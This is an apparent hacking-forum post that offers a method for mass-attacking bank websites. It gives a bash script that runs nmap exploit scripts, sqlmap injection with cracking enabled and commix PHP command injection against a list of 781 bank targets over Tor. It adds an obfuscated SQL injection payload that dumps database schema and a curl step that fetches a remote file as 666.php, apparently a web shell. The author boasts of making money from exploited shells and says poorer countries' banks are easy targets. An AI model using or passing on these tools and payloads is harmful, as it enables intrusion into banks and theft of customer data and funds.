This is a terrible title...
Hacking a bank is not necessarily difficult.
Its all on the approach of things and what youre looking to achieve.
For example, If you are targeting 1 - 2 "Specific Banks" Youre recon game must be strong and stealthy if
youre not hitting Third World Countries. #Hint Plenty of third world countries are VERY exploitable, this I can confirm personally.
If you intend on just hitting any random Bank WorldWide, Heres a very fast approach at things...
Well for ANYTHING in general.
I used 3 Keywords: banco , bank, banking
$ cat -n banking
# 781 mybankcitizens.com
781 Targets
https://paste.sh/QhX1ICXL#2i46l22_YhbS8stJpldFXoko
Code:
#!/bin/bash
echo "Enter targetsList"
read targets
read -p "Sqli-Payload -> " Unique_Sqli_Payload
read -p " Cmd-Executing -> " cmd2Exec
for i in `cat $targets`;
do
nmap -T5 -Pn --script exploit -oX nmap.xml $i &
sqlmap -v3 --forms --level=3 --risk=2 --fresh-queries --tor-type=SOCKS5 --random-agent --time-sec=45 -g "site:$i inurl:'login'" --fingerprint --dbs --batch --answers="quit=N,continue=Y,redirect=N,exploit=Y,crack=Y,all" --threads=10 --technique=BEUST --second-order="https://$i/?url=$Unique_Sqli_Payloadsleep 31 -- *" &
commix -v2 --tor-port=9050 --level 3 --technique=T --time-sec=45 --url="http://$i/url?c=" --data="%3C%3F%20system%28%27%$cmd2Exec27%29%3B%20%3F%3E" --referer "%3C%3F%20system%28%27%$cmd2Exec27%29%3B%20%3F%3E*" --user-agent "%3C%3F%20system%28%27%$cmd2Exec27%29%3B%20%3F%3E*" --cookie "%3C%3F%20system%28%27%$cmd2Exec27%29%3B%20%3F%3E*" &
done;
#Note: I just began coding in bash but Iv'e been making money exploiting shells and dumping sqli's
for years...This is just an example to point people in the direction of 'hitting sites hard and straight forward'. Banks are not indestructible fortresses -__-
Of course there are plenty of other approaches I couldve taken, like automated some Hardened Recon Techniques and actually took my time pputting together an efficient script just for this purpose...Then again theres already plenty of coded work everywhere + metasploit lol
dy570pia@exploit.im
#Payload
> %27%20%2f%2a%21UNION%2a%252f%20%2f%2a%21SELECT%2a%252f%20%281%29%2Cconcat_ws%280x00%2C%28%2f%2a%2100000select%2a%252f%28@%29%2f%2a%21from%2a%252f%28%2f%2a%2100000select%2a%252f%28@%3A%3D0x00%29%2C%28%2f%2a%2100000select%2a%252f%28@%29%2f%2a%21from%2a%252f%28%2f%2a%21information_schema%2a%252f.columns%29%2f%2a%21where%2a%252f%28table_schema%3Ddatabase%2f%2a%21%28%29%2a%252f%29and%280x00%29in%2f%2a%21%28@%3A%3Dconcat_ws%280x00%2C%28@%29%2C%280x3c62723e%29%2C%28table_name%29%2C%280x203a3a20%29%2C%28column_name%29%29%2a%252f%29%29%29x%29%29%2C%283%29%2C%284%29%2C%285%29%20*%20
#CmdExec
> curl -o 666.php
https://paste.sh/HGv5srre#wmNYEDkJEL1ZBtErSbpPTQg0
![[Image: 51L8vh-KJfL.jpg]](https://images-na.ssl-images-amazon.com/images/I/51L8vh-KJfL.jpg)
